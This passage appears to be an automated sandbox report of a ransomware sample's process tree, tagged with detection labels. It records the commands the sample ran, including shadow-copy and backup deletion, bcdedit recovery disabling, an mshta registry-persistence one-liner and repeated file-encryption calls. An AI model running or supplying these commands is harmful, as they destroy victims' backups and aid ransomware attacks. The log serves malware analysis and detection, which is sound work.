                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:1788
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  "SCHTASKS" /Delete /tn "gxx speed launcher" /f
                                                                                  3⤵
                                                                                    PID:1944
                                                                                  • C:\Windows\SysWOW64\arp.exe
                                                                                    "arp" -a
                                                                                    3⤵
                                                                                    • Network Service Discovery
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2304
                                                                                • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                  Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:3036
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2448
                                                                                  • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe
                                                                                    "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" runas
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Access Token Manipulation: Create Process with Token
                                                                                    PID:2616
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Purga.bk-89258854adce5f5fd4d99ece5aad39b306f40585810ced9b0f79dad43fd8e036.exe" "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                      4⤵
                                                                                        PID:5020
                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                        PID:1604
                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                          mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('database.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\XKOQon',i);}catch(e){}},10);"
                                                                                          5⤵
                                                                                          • Adds Run key to start application
                                                                                          • Modifies Internet Explorer settings
                                                                                          PID:5528
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
                                                                                          5⤵
                                                                                            PID:2988
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE
                                                                                            5⤵
                                                                                              PID:3912
                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                wmic SHADOWCOPY DELETE
                                                                                                6⤵
                                                                                                  PID:5548
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
                                                                                                5⤵
                                                                                                  PID:2976
                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                    vssadmin Delete Shadows /All /Quiet
                                                                                                    6⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:4812
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
                                                                                                  5⤵
                                                                                                    PID:2316
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                    5⤵
                                                                                                      PID:3716
                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\!HELP_SOS.hta"
                                                                                                      5⤵
                                                                                                        PID:3164
                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Data Admin.exe"
                                                                                                        5⤵
                                                                                                          PID:5036
                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\desktop.ini"
                                                                                                          5⤵
                                                                                                          • Drops desktop.ini file(s)
                                                                                                          PID:1428
                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\pagefile.sys"
                                                                                                          5⤵
                                                                                                            PID:2548
                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x64.log-MSI_vc_red.msi.txt.sage"
                                                                                                            5⤵
                                                                                                              PID:4428
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2010_x86.log.html.sage"
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2440
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log.sage"
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2756
                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log.sage"
                                                                                                              5⤵
                                                                                                                PID:4424
                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2012_x86_1_vcRuntimeAdditional_x86.log.sage"
                                                                                                                5⤵
                                                                                                                  PID:5992
                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log.sage"
                                                                                                                  5⤵
                                                                                                                    PID:6064
                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2013_x86_000_vcRuntimeMinimum_x86.log.sage"
                                                                                                                    5⤵
                                                                                                                      PID:1564
                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_000_vcRuntimeMinimum_x64.log.sage"
                                                                                                                      5⤵
                                                                                                                        PID:1848
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x64_001_vcRuntimeAdditional_x64.log.sage"
                                                                                                                        5⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:4476
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_001_vcRuntimeMinimum_x86.log.sage"
                                                                                                                        5⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:2824
                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\vcredist2022_x86_002_vcRuntimeAdditional_x86.log.sage"
                                                                                                                        5⤵
                                                                                                                          PID:4460
                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll"
                                                                                                                          5⤵
                                                                                                                            PID:2608
                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll"
                                                                                                                            5⤵
                                                                                                                              PID:4704
                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll"
                                                                                                                              5⤵
                                                                                                                                PID:6036
                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll"
                                                                                                                                5⤵
                                                                                                                                  PID:3760
                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
